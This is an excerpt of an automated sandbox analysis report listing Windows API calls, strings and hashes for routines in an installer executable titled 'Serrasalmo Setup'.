                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F$Serrasalmo Setup
                                                                                • API String ID: 941294808-2361861206
                                                                                • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                                                • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(004308E8,NUL,?,00000000,?,?,00405F12,?,?), ref: 00405D8E
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                • wsprintfA.USER32 ref: 00405DF6
                                                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                  • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C29
                                                                                  • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C4B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                • API String ID: 222337774-899692902
                                                                                • Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                • Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                APIs
                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                • *?|<>/":, xrefs: 00406336
                                                                                • "C:\Users\user\Desktop\WtZl31OLfA.exe", xrefs: 004062E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-3779538197
                                                                                • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                • GetSysColor.USER32(?), ref: 004041DF
                                                                                • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                • DeleteObject.GDI32(?), ref: 00404209
                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                APIs
                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                  • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                • String ID: 9
                                                                                • API String ID: 163830602-2366072709
                                                                                • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                                                • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                                                • GetMessagePos.USER32 ref: 00404A9C
                                                                                • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                                                • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                • MulDiv.KERNEL32(000BDD25,00000064,000BDD29), ref: 00402D4D
                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                Strings
                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: verifying installer: %d%%
                                                                                • API String ID: 1451636040-82062127
                                                                                • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                • String ID:
                                                                                • API String ID: 2667972263-0
                                                                                • Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                                                • Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                • Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                • String ID:
                                                                                • API String ID: 3808545654-0
                                                                                • Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                                                • Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                • wsprintfW.USER32 ref: 00404A15
                                                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s
                                                                                • API String ID: 3540041739-3551169577
                                                                                • Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                                                • Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                                                APIs
                                                                                • SetWindowTextW.USER32(00000000,Serrasalmo Setup), ref: 00403C07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
